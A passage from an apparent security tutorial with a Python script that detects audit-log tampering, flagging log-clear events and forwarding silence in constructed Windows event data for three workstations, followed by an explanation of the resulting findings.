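    return f"2024-10-14T{hhmm}:00"


# Constructed events for a two-hour window. fin-ws-02 chatters every 10
# minutes; mchen-ws clears its Security log at 00:40 and then sends nothing;
# hr-ws-07 is in the inventory but never reports at all.
EVENTS: List[Event] = (
    [(_t(f"{h:02d}:{m:02d}"), "fin-ws-02", 4688, "a.lopez")
     for h in (0, 1) for m in range(0, 60, 10)]
    + [(_t("00:00"), "mchen-ws", 4624, "mchen"),
       (_t("00:10"), "mchen-ws", 4688, "mchen"),
       (_t("00:20"), "mchen-ws", 4688, "mchen"),
       (_t("00:30"), "mchen-ws", 4688, "mchen"),
       (_t("00:40"), "mchen-ws", 1102, "mchen")]
)
HOSTS = ["fin-ws-02", "mchen-ws", "hr-ws-07"]   # constructed asset inventory
WINDOW_START, WINDOW_END = _t("00:00"), _t("02:00")


@dataclass(frozen=True)
class Finding:
    kind: str
    host: str
    detail: str


def detect_log_tampering(events: List[Event], hosts: List[str],
                         start: str, end: str, max_silence_min: int = 30) -> List[Finding]:
    findings: List[Finding] = []
    t0, t1 = datetime.fromisoformat(start), datetime.fromisoformat(end)
    # 1. Explicit clearing: the forwarded copy survives even though the local log does not.
    for ts, host, eid, user in events:
        if eid in LOG_CLEARED_IDS:
            findings.append(Finding("audit_log_cleared", host, f"event {eid} by {user} at {ts}"))
    # 2. Silence: a host that stops forwarding, or never forwards, is itself a finding
    #    ("the absence of expected logs is itself evidence").
    by_host = {h: [] for h in hosts}
    for ts, host, _, _ in events:
        if host in by_host:
            by_host[host].append(datetime.fromisoformat(ts))
    limit = timedelta(minutes=max_silence_min)
    for host, stamps in by_host.items():
        points = [t0] + sorted(s for s in stamps if t0 <= s <= t1) + [t1]
        worst = max(b - a for a, b in zip(points, points[1:]))
        if worst > limit:
            minutes = int(worst.total_seconds() // 60)
            findings.append(Finding("log_silence", host, f"no events for {minutes} min"))
    return findings


if __name__ == "__main__":
    for f in detect_log_tampering(EVENTS, HOSTS, WINDOW_START, WINDOW_END):
        print(f"[{f.kind}] {f.host}: {f.detail}")
```

The script reports three findings: the 1102 on mchen-ws (the clearing event arrives at the SIEM before the local log is emptied, so the cleanup is self-documenting), an 80-minute silence on the same host afterwards, and a host in inventory that never reported. The silence check is what catches an insider who disables the forwarder rather than clearing the log; both checks depend on the SIEM retaining its copy in storage the workstation administrator cannot delete.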